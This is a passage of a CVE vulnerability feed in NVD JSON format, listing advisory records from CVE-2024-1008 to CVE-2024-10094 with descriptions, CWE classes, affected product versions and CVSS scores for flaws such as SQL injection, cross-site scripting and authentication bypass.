"tags" : [ "Third Party Advisory" ] }, { "url" : "https://www.youtube.com/watch?v=z4gcLZCOcnc", "name" : "https://www.youtube.com/watch?v=z4gcLZCOcnc", "refsource" : "", "tags" : [ "Exploit" ] }, { "url" : "https://vuldb.com/?ctiid.252277", "name" : "https://vuldb.com/?ctiid.252277", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://www.youtube.com/watch?v=z4gcLZCOcnc", "name" : "https://www.youtube.com/watch?v=z4gcLZCOcnc", "refsource" : "", "tags" : [ "Exploit" ] }, { "url" : "https://vuldb.com/?id.252277", "name" : "https://vuldb.com/?id.252277", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in SourceCodester Employee Management System 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file edit-photo.php of the component Profile Page. The manipulation leads to unrestricted upload. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-252277 was assigned to this vulnerability." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:razormist:employee_management_system:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "HIGH", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 7.2, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 1.2, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-29T16:15Z", "lastModifiedDate" : "2024-11-21T08:49Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10080", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/1bee1eeb-5354-47c9-9ae1-b1608d87d7bb?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/1bee1eeb-5354-47c9-9ae1-b1608d87d7bb?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://plugins.trac.wordpress.org/browser/easy-post-types/tags/1.4.4/custom-type.php#L1622", "name" : "https://plugins.trac.wordpress.org/browser/easy-post-types/tags/1.4.4/custom-type.php#L1622", "refsource" : "", "tags" : [ "Product" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The WP Easy Post Types plugin for WordPress is vulnerable to Stored Cross-Site Scripting via post meta in versions up to, and including, 1.4.4 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:newsignature:wp_easy_post_types:*:*:*:*:*:wordpress:*:*", "versionEndIncluding" : "1.4.4", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 5.4, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.3, "impactScore" : 2.7 } }, "publishedDate" : "2024-10-18T08:15Z", "lastModifiedDate" : "2024-10-22T16:27Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10081", "ASSIGNER" : "psirt@ericsson.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/Ericsson/codechecker/security/advisories/GHSA-f3f8-vx3w-hp5q", "name" : "https://github.com/Ericsson/codechecker/security/advisories/GHSA-f3f8-vx3w-hp5q", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "CodeChecker is an analyzer tooling, defect database and viewer extension for the Clang Static Analyzer and Clang Tidy. \nAuthentication bypass occurs when the API URL ends with Authentication. This bypass allows superuser access to all API endpoints other than Authentication. These endpoints include the ability to add, edit, and remove products, among others. All endpoints, apart from the /Authentication is affected by the vulnerability.\n\nThis issue affects CodeChecker: through 6.24.1." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2024-11-06T15:15Z", "lastModifiedDate" : "2024-11-06T18:17Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10082", "ASSIGNER" : "psirt@ericsson.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://github.com/Ericsson/codechecker/security/advisories/GHSA-fpm5-2wcj-vfr7", "name" : "https://github.com/Ericsson/codechecker/security/advisories/GHSA-fpm5-2wcj-vfr7", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "CodeChecker is an analyzer tooling, defect database and viewer extension for the Clang Static Analyzer and Clang Tidy. \nAuthentication method confusion allows logging in as the built-in root user from an external service. The built-in root user up until 6.24.1 is generated in a weak manner, cannot be disabled, and has universal access.This vulnerability allows an attacker who can create an account on an enabled external authentication service, to log in as the root user, and access and control everything that can be controlled via the web interface. The attacker needs to acquire the username of the root user to be successful.\n\nThis issue affects CodeChecker: through 6.24.1." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2024-11-06T15:15Z", "lastModifiedDate" : "2024-11-06T18:17Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10083", "ASSIGNER" : "cpcert@se.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-20" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://download.schneider-electric.com/files?p_Doc_Ref=SEVD-2025-042-02&p_enDocType=Security+and+Safety+Notice&p_File_Name=SEVD-2025-042-02.pdf", "name" : "https://download.schneider-electric.com/files?p_Doc_Ref=SEVD-2025-042-02&p_enDocType=Security+and+Safety+Notice&p_File_Name=SEVD-2025-042-02.pdf", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "CWE-20: Improper Input Validation vulnerability exists that could cause denial of service of engineering\nworkstation when specific driver interface is invoked locally by an authenticated user with crafted input." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2025-02-13T06:15Z", "lastModifiedDate" : "2025-02-13T06:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10084", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-200" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/e051a83e-ad5a-4789-bfee-e03aa9d6a3fc?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/e051a83e-ad5a-4789-bfee-e03aa9d6a3fc?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://plugins.trac.wordpress.org/browser/contact-form-7-dynamic-text-extension/tags/4.5.0/includes/shortcodes.php#L225", "name" : "https://plugins.trac.wordpress.org/browser/contact-form-7-dynamic-text-extension/tags/4.5.0/includes/shortcodes.php#L225", "refsource" : "", "tags" : [ "Product" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Contact Form 7 – Dynamic Text Extension plugin for WordPress is vulnerable to Basic Information Disclosure in all versions up to, and including, 4.5 via the CF7_get_post_var shortcode. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract the titles and text contents of private and password-protected posts, they do not own." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:sevenspark:contact_form_7_-_dynamic_text_extension:*:*:*:*:*:wordpress:*:*", "versionEndExcluding" : "4.5.1", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "NONE", "availabilityImpact" : "NONE", "baseScore" : 4.3, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.8, "impactScore" : 1.4 } }, "publishedDate" : "2024-11-05T22:15Z", "lastModifiedDate" : "2025-07-11T13:57Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10086", "ASSIGNER" : "security@hashicorp.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://discuss.hashicorp.com/t/hcsec-2024-24-consul-vulnerable-to-reflected-xss-on-content-type-error-manipulation", "name" : "https://discuss.hashicorp.com/t/hcsec-2024-24-consul-vulnerable-to-reflected-xss-on-content-type-error-manipulation", "refsource" : "", "tags" : [ "Vendor Advisory" ] }, { "url" : "https://security.netapp.com/advisory/ntap-20250110-0006/", "name" : "https://security.netapp.com/advisory/ntap-20250110-0006/", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was identified in Consul and Consul Enterprise such that the server response did not explicitly set a Content-Type HTTP header, allowing user-provided inputs to be misinterpreted and lead to reflected XSS." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:hashicorp:consul:*:*:*:*:enterprise:*:*:*", "versionStartIncluding" : "1.19.0", "versionEndExcluding" : "1.19.3", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:hashicorp:consul:*:*:*:*:enterprise:*:*:*", "versionStartIncluding" : "1.18.0", "versionEndExcluding" : "1.18.5", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:hashicorp:consul:*:*:*:*:enterprise:*:*:*", "versionStartIncluding" : "1.4.1", "versionEndExcluding" : "1.15.15", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:hashicorp:consul:*:*:*:*:community:*:*:*", "versionStartIncluding" : "1.4.1", "versionEndExcluding" : "1.20.0", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 6.1, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.8, "impactScore" : 2.7 } }, "publishedDate" : "2024-10-30T22:15Z", "lastModifiedDate" : "2025-01-10T13:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10087", "ASSIGNER" : "cvd@cert.pl" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://cert.pl/en/posts/2025/04/CVE-2024-10087", "name" : "https://cert.pl/en/posts/2025/04/CVE-2024-10087", "refsource" : "", "tags" : [ ] }, { "url" : "https://www.iksoris.pl/system-rezerwacji-i-sprzedazy-biletow-iksoris.html", "name" : "https://www.iksoris.pl/system-rezerwacji-i-sprzedazy-biletow-iksoris.html", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "Internet Starter, one of SoftCOM iKSORIS system modules, is vulnerable to Reflected XSS (Cross-site Scripting) attacks. An attacker might craft a link containing a malicious script, which then gets directly embedded in references to other resources, what causes the script to run in user's context multiple times. \nThis vulnerability has been patched in version 79.0" } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2025-04-14T12:15Z", "lastModifiedDate" : "2025-04-14T12:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10088", "ASSIGNER" : "cvd@cert.pl" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://cert.pl/en/posts/2025/04/CVE-2024-10087", "name" : "https://cert.pl/en/posts/2025/04/CVE-2024-10087", "refsource" : "", "tags" : [ ] }, { "url" : "https://www.iksoris.pl/system-rezerwacji-i-sprzedazy-biletow-iksoris.html", "name" : "https://www.iksoris.pl/system-rezerwacji-i-sprzedazy-biletow-iksoris.html", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "Internet Starter, one of SoftCOM iKSORIS system modules, is vulnerable to Reflected XSS (Cross-site Scripting) attacks. An attacker might trick a user into filling a login form with a malicious script, what causes the script to run in user's context. \nThis vulnerability has been patched in version 79.0" } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2025-04-14T12:15Z", "lastModifiedDate" : "2025-04-14T12:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10089", "ASSIGNER" : "cvd@cert.pl" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://cert.pl/en/posts/2025/04/CVE-2024-10087", "name" : "https://cert.pl/en/posts/2025/04/CVE-2024-10087", "refsource" : "", "tags" : [ ] }, { "url" : "https://www.iksoris.pl/system-rezerwacji-i-sprzedazy-biletow-iksoris.html", "name" : "https://www.iksoris.pl/system-rezerwacji-i-sprzedazy-biletow-iksoris.html", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "Internet Starter, one of SoftCOM iKSORIS system modules, is vulnerable to Stored XSS (Cross-site Scripting) attacks. An attacker might trick a user into filling a form designed for changing user's data with a malicious script, what causes the script to run in user's context. \nThis vulnerability has been patched in version 79.0" } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2025-04-14T12:15Z", "lastModifiedDate" : "2025-04-14T12:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-1009", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-89" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://vuldb.com/?ctiid.252278", "name" : "https://vuldb.com/?ctiid.252278", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?id.252278", "name" : "https://vuldb.com/?id.252278", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://youtu.be/oL98TSjy89Q?si=_T6YkJZlbn7SJ4Gn", "name" : "https://youtu.be/oL98TSjy89Q?si=_T6YkJZlbn7SJ4Gn", "refsource" : "", "tags" : [ "Exploit" ] }, { "url" : "https://vuldb.com/?ctiid.252278", "name" : "https://vuldb.com/?ctiid.252278", "refsource" : "", "tags" : [ "Permissions Required", "Third Party Advisory" ] }, { "url" : "https://youtu.be/oL98TSjy89Q?si=_T6YkJZlbn7SJ4Gn", "name" : "https://youtu.be/oL98TSjy89Q?si=_T6YkJZlbn7SJ4Gn", "refsource" : "", "tags" : [ "Exploit" ] }, { "url" : "https://vuldb.com/?id.252278", "name" : "https://vuldb.com/?id.252278", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability was found in SourceCodester Employee Management System 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file /Admin/login.php. The manipulation of the argument txtusername leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-252278 is the identifier assigned to this vulnerability." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:employee_management_system_project:employee_management_system:1.0:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-01-29T17:15Z", "lastModifiedDate" : "2024-11-21T08:49Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10090", "ASSIGNER" : "cvd@cert.pl" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://cert.pl/en/posts/2025/04/CVE-2024-10087", "name" : "https://cert.pl/en/posts/2025/04/CVE-2024-10087", "refsource" : "", "tags" : [ ] }, { "url" : "https://www.iksoris.pl/system-rezerwacji-i-sprzedazy-biletow-iksoris.html", "name" : "https://www.iksoris.pl/system-rezerwacji-i-sprzedazy-biletow-iksoris.html", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "Internet Starter, one of SoftCOM iKSORIS system modules, is vulnerable to Reflected XSS (Cross-site Scripting) attacks. An attacker might trick a user into filling a form designed for adding users with a malicious script, what causes the script to run in user's context. \nThis vulnerability has been patched in version 79.0" } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2025-04-14T12:15Z", "lastModifiedDate" : "2025-04-14T12:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10091", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/00b278af-6ce6-4e70-a83a-a1b035542cd4?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/00b278af-6ce6-4e70-a83a-a1b035542cd4?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://plugins.trac.wordpress.org/browser/elementskit-lite/tags/3.2.9/widgets/image-comparison/image-comparison.php#L657", "name" : "https://plugins.trac.wordpress.org/browser/elementskit-lite/tags/3.2.9/widgets/image-comparison/image-comparison.php#L657", "refsource" : "", "tags" : [ "Product" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The ElementsKit Elementor addons plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Image Comparison Widget in all versions up to, and including, 3.2.9 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:wpmet:elements_kit_elementor_addons:*:*:*:*:*:wordpress:*:*", "versionEndExcluding" : "3.3.0", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 5.4, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.3, "impactScore" : 2.7 } }, "publishedDate" : "2024-10-26T03:15Z", "lastModifiedDate" : "2025-01-16T21:48Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10092", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-862" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/f1e50d8c-e61c-4e94-b5e8-b24832dc24b6?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/f1e50d8c-e61c-4e94-b5e8-b24832dc24b6?source=cve", "refsource" : "", "tags" : [ ] }, { "url" : "https://plugins.trac.wordpress.org/browser/download-monitor/tags/5.0.12/src/KeyGeneration/class-dlm-key-generation.php#L299", "name" : "https://plugins.trac.wordpress.org/browser/download-monitor/tags/5.0.12/src/KeyGeneration/class-dlm-key-generation.php#L299", "refsource" : "", "tags" : [ ] }, { "url" : "https://plugins.trac.wordpress.org/changeset/3173614/download-monitor/trunk/src/KeyGeneration/class-dlm-key-generation.php", "name" : "https://plugins.trac.wordpress.org/changeset/3173614/download-monitor/trunk/src/KeyGeneration/class-dlm-key-generation.php", "refsource" : "", "tags" : [ ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Download Monitor plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the ajax_handle_api_key_actions function in all versions up to, and including, 5.0.12. This makes it possible for authenticated attackers, with Subscriber-level access and above, to revoke existing API keys and generate new ones." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "NONE", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 4.3, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.8, "impactScore" : 1.4 } }, "publishedDate" : "2024-10-26T08:15Z", "lastModifiedDate" : "2024-10-28T13:58Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10093", "ASSIGNER" : "cna@vuldb.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ { "url" : "https://vuldb.com/?ctiid.280758", "name" : "VDB-280758 | CTI Indicators (IOB, IOC, TTP, IOA)", "refsource" : "", "tags" : [ "Permissions Required" ] }, { "url" : "https://vuldb.com/?id.280758", "name" : "VDB-280758 | VSO ConvertXtoDvd ConvertXtoDvd.exe uncontrolled search path", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://vuldb.com/?submit.420798", "name" : "Submit #420798 | VSO Software ConvertXtoDVD 7.0.0.83 DLL Hijacking", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A vulnerability, which was classified as critical, was found in VSO ConvertXtoDvd 7.0.0.83. Affected is an unknown function in the library avcodec.dll of the file ConvertXtoDvd.exe. The manipulation leads to uncontrolled search path. Attacking locally is a requirement. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:vso-software:convertxtodvd:7.0.0.83:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "attackVector" : "LOCAL", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "REQUIRED", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 7.8, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 1.8, "impactScore" : 5.9 } }, "publishedDate" : "2024-10-17T23:15Z", "lastModifiedDate" : "2024-11-01T18:07Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-10094", "ASSIGNER" : "security@pega.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-94" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://support.pega.com/support-doc/pega-security-advisory-d24-vulnerability-remediation-note", "name" : "https://support.pega.com/support-doc/pega-security-advisory-d24-vulnerability-remediation-note", "refsource" : "", "tags" : [ "Vendor Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "Pega Platform versions 6.x to Infinity 24.1.1 are affected by an issue with Improper Control of Generation of Code" } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:pega:infinity:*:*:*:*:*:*:*:*", "versionStartIncluding" : "8.2", "versionEndExcluding" : "8.2.8", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:pega:infinity:*:*:*:*:*:*:*:*", "versionStartIncluding" : "8.3.0", "versionEndExcluding" : "8.3.6", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:pega:infinity:*:*:*:*:*:*:*:*", "versionStartIncluding" : "8.4.0", "versionEndExcluding" : "8.4.6", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:pega:infinity:*:*:*:*:*:*:*:*", "versionStartIncluding" : "8.5", "versionEndExcluding" : "8.5.6", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:pega:infinity:*:*:*:*:*:*:*:*", "versionStartIncluding" : "8.6.0", "versionEndExcluding" : "8.6.6 ", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:pega:infinity:*:*:*:*:*:*:*:*", "versionStartIncluding" : "23.1.0", "versionEndExcluding" : "23.1.4 ", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:pega:infinity:*:*:*:*:*:*:*:*", "versionStartIncluding" : "6.0", "versionEndExcluding" : "8.1.9", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:pega:infinity:*:*:*:*:*:*:*:*", "versionStartIncluding" : "24.1.0", "versionEndExcluding" : "24.1.2 ", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:pega:infinity:*:*:*:*:*:*:*:*", "versionStartIncluding" : "8.7.0", "versionEndIncluding" : "8.8.5", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-11-20T15:15Z", "lastModifiedDate" : "2025-03-10T17:40Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { 